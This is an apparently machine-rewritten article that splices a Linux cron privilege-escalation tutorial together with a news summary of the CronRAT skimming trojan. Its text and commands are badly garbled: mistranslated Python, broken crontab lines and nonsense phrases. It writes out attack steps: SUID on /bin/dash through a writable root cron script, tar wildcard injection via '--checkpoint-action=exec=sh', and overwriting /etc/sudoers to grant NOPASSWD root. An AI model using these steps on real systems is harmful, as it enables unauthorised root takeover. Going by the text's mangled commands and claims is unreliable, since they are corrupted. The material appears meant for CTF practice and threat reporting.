New Linux malware hides in cron jobs with bad data

After working on several OSCP issues, we decided to write an article about the various techniques used to extend the capabilities of Linux, which may be useful to our readers in their infiltration project. In this article, experts will learn “Elevation of Privilege with Jobs” to gain root access to a remote host machine and learn how misuse of cron jobs can lead to privilege escalation. If you have eliminated CTF threats after the exploit, after reading this article, you will find several flaws leading to privilege escalation.

For more information, you can read the previous human article where we did this particular privilege escalation trick. Open the links below:

  • Presentation
  • Cron job
  • Crontab syntax
  • Overwrite crontab file
  • Setting up a workshop (Ubuntu)
  • Using a Cron Revenue Stream (Kali Linux)
  • Crontab Resin Injection
  • Configuring wildcards (Ubuntu)
  • Used by Cronjob (Kali Linux)
  • What Is An Important Cron Job?

    Cron jobs useThey are used to schedule tasks by executing commands that are sent to the server at specific dates and times. You are most often used as a system administrator for things like backing up or maintaining /tmp/ and directories, etc. The word cron comes from crontab this and is found in the /etc directory.

    For example: in crontab we can include the following to automatically generate Apache error logs every hour.

    1 0 * * 7 . printf "" > /var/log/apache/error_log

    Overwrite Crontab File

    Goal: Define a new task using crontab to run a Python program that clears all data transfer usage in the specified directory.

    Let’s say, for example, if ‘Purge’ is a directory whose data is automatically purged every two minutes. Therefore, we saved some search queries in /home/cleanup.

    cleanup mkdir
    cleaning CDs
    echo "hello friends" > 1.txt
    echo "ALL files will be deleted in 2 minutes" > 2.txt
    echo > 1.php
    echo > 2.php

    As you can see, a number of files are saved in the purge directory from the specified image. Write

    Now the Python program is back infight another directory to wipe the drive from the inside and give /home/cleanup full technical permissions.

    cd /tmp
    Import operating system
    import system
    To attempt:
    os.system('rm -r /home/cleanup/* ')
    chmod 777

    Finally, schedule a task with crontab to remove every 2 minutes.

    nano /etc/crontab
    */2 * * * * root /tmp/
    chmod 777
    cd /home/cleaning
    date of

    It’s cold!! It does its job because you can see that all the information has been deleted after a few minutes.


    Start with your attack and the computer that compromised the target system, then go to the privilege level. Let’s say I successfully login to the non-root user terminal of the victim computer and login using ssh. Run the next data collection as shown below.

    cat /etc/crontab
    ls -al /tmp/
    cat /tmp/

    You can see from the above steps that crontab runs a null python program every two minutes. Let’s enjoy it now.

    This is why many people have access to twoI can’t, since my husband and I enabled the /bin/dash SUID bits for this method. It can be quite simple to first initiate the opening with an editor like and replace “rm /tmp/*” with -r with the specific line that follows.

    os.system('chmod u+s /bin/dash')

    After two minutes, the suid permission will be placed in /bin/dash, and even if you run it, the reason it was there will grant access.

    I would like

    Crontab Tar Wildcard Injection

    Target: Time taken to complete a task using crontab to create a black archive backup of the program’s HTML directory.

    The directory must have execute permission that you can backup.

    Now a temp task using crontab that runs the tar archiver to fetch backups from /html to /var/backups every minute.

    nano /etc/crontab
    */13 . * * root tar -zcf /var/backups/html.tgz Check /var/www/html/*

    Let’s say the schedule probably won’t work when running a future command.

    cd /var/backup

    In the image below, you will probably notice that the html.tgz file is narrower was generated in 1 minute.


    Start with the attack and the computer, first compromise the main target system, and then move on to support privilege level escalation. Assuming I’m mapping logging directly into the victim’s system and ssh access to critical non-root users. Then open crontab to view the case when the task is scheduled.

    cat /etc/crontab

    Here, my wife and I realize that Target has scheduled a useful tar archiver every 0 minutes, and we know that a cron job can be run as root. Be sure to enjoy it.

    Run the following command to grant the sudo privilege to a signed user, and the following exploit message is notorious for wildcard injection.

    echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >
    echo "" > "--checkpoint-action=exec=sh"
    echo "" > --checkpoint=1
    tar see archive.tar *

    It will now provide the user with Ignite sudo after a certain minute: buyers can verify this in the image below.

    sudo -l

    Author: Artie Cngh, official researcher and technical writer on hacker attacks, information security advisor, social media and gadget lover. Contact here

    Hack Like Pro: Linux Essentials for the Beginner Hacker, Part (18 Job Scheduling)
    Hack Like a Pro: Linux for Beginner Hackers Part 18 (Task Scheduling)
    Hack Like a Pro: Linux Basics, Aspiring Hacker Part 18 (Task Scheduling)
    Hack Like a Pro: Linux for All Beginner Hackers Basics Part 18 (Task Scheduling)
    Hack Like a Pro: Linux Basics, Aspiring Hacker Part 18 (Task Scheduling)

    Security Researchersdiscovered that they have a new remote trojan virus (RAT) for Linux that makes all profiles almost invisible while performing important scheduled tasks on a beautiful non-existent day of December 31st. February, in a mask.

    CronRAT I would argue that malware is currently targeting online retailers and allowing attackers to steal credit cards by deploying online payment skimmers on Linux servers.

    CronRAT is inventive and sophisticated when it comes to online shopping Trojans and goes unnoticed by many malware.

    Smart Payload Hiding

    CronRAT often abuses the Linux cron job scheduling system and realizes that scheduling jobs can run on non-existent calendar days, such as February 31st.

    Linux cron accepts system dates as long as they are in the correct format, even now if the day is not showing in the calendar – which scheduled task options won’t run.

    This has become what CronRAT relies on when you need to hideness. A brief report by Dutch cybersecurity company Sansec says it hides a “complex bash program” in the names of actual scheduled tasks. KronRAT

    “This adds many tasks to the crontab with a strange new specification: date 52 23 thirty-one 2 3. These lines will be syntactically correct, but will raise a run-time error when executed. However, this event will never be unique. because usually it is scheduled for February 31,” Sansec researchers explain.

    Payloads are usually masked multiple times using compression levels and Base64 encoding. The program perfectly understands self-destruct commands, timing, modulation, and even its own protocol that allows us to communicate with a remote server.

    The survey notes that malicious contacts require a C2 system ( with “an exotic feature, like how the Linux kernel allows TCP telecommunications through a file.”

    Also, the connection is being prepared over TCP via Vent 443 using a false flag as you can see the Dropbe SSH servicear, which also helps malware stay undetected.

    After communicating with the server, c2 stops hiding, sends and receives multiple requests, and receives a malicious dynamic selection. At the end of these exchanges, the attackers behind CronRAT can use any command on the failed system.